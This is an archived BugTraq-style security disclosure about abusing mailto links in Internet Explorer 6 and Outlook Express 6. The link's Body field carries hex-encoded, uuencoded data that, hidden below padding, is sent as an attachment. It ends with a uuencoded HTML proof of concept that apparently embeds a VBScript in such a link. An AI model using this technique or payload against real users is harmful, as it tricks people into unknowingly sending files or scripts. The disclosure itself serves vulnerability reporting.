mailto links

["[Segmen]" <dontpanic999 () yahoo com>]

Apologies in advance if this is a known issue.

I discovered this a few days ago, a friend advised me to submit it to
BugTraq.

As I'm sure you all know, mailto links do not have to hold just an address,
they can also pass parameters for use as the email Subject and Body. These
parameters takes format
"mailto:username () host com?Subject=SubjectGoesHere&Body=BodyGoesHere" . We
can also Hex-Encode characters so we can use
"mailto:username () host com?Subject=Subject%20Goes%20Here&Body=Body%20Goes%20H
ere" . But we can fit quite a lot of data into the Body field, which means
we can Hex-encode some uuencoded data into there. [ Apologies if the link
wraps ]
I have been experimenting with Internet Explorer 6, and Outlook Express 6
and have been able to pass some uuencoded files with the mailto.

I have attached a HTML file, with an example of this, but the email is
padded first so the user would have to scroll down to see the uuencoded
data. I have encoded a quick VB Script just as an example, There is a limit,
and if there is a lot of data, IE wont respond to clicking the link. Maybe
people with access to other platforms and browsers/email clients can try
this out and report back.

Because this method uses uuencoding and not MIME no additional headers are
required, so should the user not be vigilant enough to scroll down or notice
their sig missing, they will be sending an attachment. All clients that I am
aware of will interpret uuencoded data in this format as an attachment. This
is certainly the case with OE6, as I have tried it.

thats it :o)

--
http://www.ukchat.com - UKChat
http://sdf.lonestar.org - SDF Public Access UNIX system
http://www.geocities.com/dontpanic999/ - my WebSpace



begin 666 test.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93Y$96UO;G-T<F%T:6]N(&]F($UA;&EC
M:6]U<R!M86EL=&\G<SPO=&ET;&4^#0H\+VAE860^#0H\8F]D>3X-"CQB/B!0
M;&5A<V4@8VQI8VL@=&AI<R!F<FEE;F1L>2!L:6YK('1O('-E;F0@;64@;6%I
M;" \+V(^/&)R/@T*/"$M+2!4:&ES($QI;FL@<VAO=6QD(&AI9&4@82!U=65N
M8V]D960@5D)38W)I<'0@870@=&AE(&)O='1O;2!O9B!A(&5M86EL("TM/@T*
M/"$M+2!7<FET=&5N("8@1&ES8V]V97)E9"!B>2 \1&]N=%!A;FEC.3DY0'EA
M:&]O+F-O;3X@+2T^#0H\(2TM(&YB+B!7;W)K<R!J=7-T('1H92!S86UE('=I
M=&AO=70@=&AE(")!;'=A>7,@4V-R;VQL($1O=VX@8FET(B A("TM/@T*/&$@
M:')E9CTB;6%I;'1O.G9I8W1I;4!V:6-T:6TN8V]M/V)O9'D]06QW87ES)3(P
M4V-R;VQL)3(P1&]W;B4R,%=H96XE,C!&;VQL;W=I;F<E,C!M86EL=&\G<R$E
M,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E
M,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E
M,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E,$$E,$0E
M,$$E-C(E-C4E-C<E-CDE-D4E,C E,S8E,S8E,S8E,C E-S@E,D4E-S8E-C(E
M-S,E,$0E,$$E-$0E,S,E,S4E,D0E,C<E,S E-#0E-40E,S@E,C@E-#4E,S$E
M-#@E,T$E,S<E,D,E-# E,T0E-38E,C4E-3,E,C@E,C8E,C0E-# E,T$E,C8E
M-#4E-#0E,SDE,C8E,S4E-$4E,C@E,C8E,C4E-30E,T0E,C8E,C4E-#,E,T$E
M,C8E-34E-#4E,T(E-#<E,S E-#$E,C@E,C,E-3$E-#0E,T(E-38E-3DE-30E
M,T,E,C8E,C4E-$4E,$0E,$$E,S$E,T$E,S8E,D,E-3DE,D4E,S,E-#4E,C E
M,T4E,S8E,C4E-#@E,T(E-38E-4,E-$4E,S@E-38E-40E-$0E,D8E-#(E,C@E
M-C E,$0E,$$E-C E,$0E,$$E-C4E-D4E-C0E,$0E,$$B/G=E8FUA<W1E<D!N
L;W1A=FEC=&EM+F-O;3PO83X\8G(^#0H\<#X-"CPO8F]D>3X-"CPO:'1M;#X`
`
end


_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com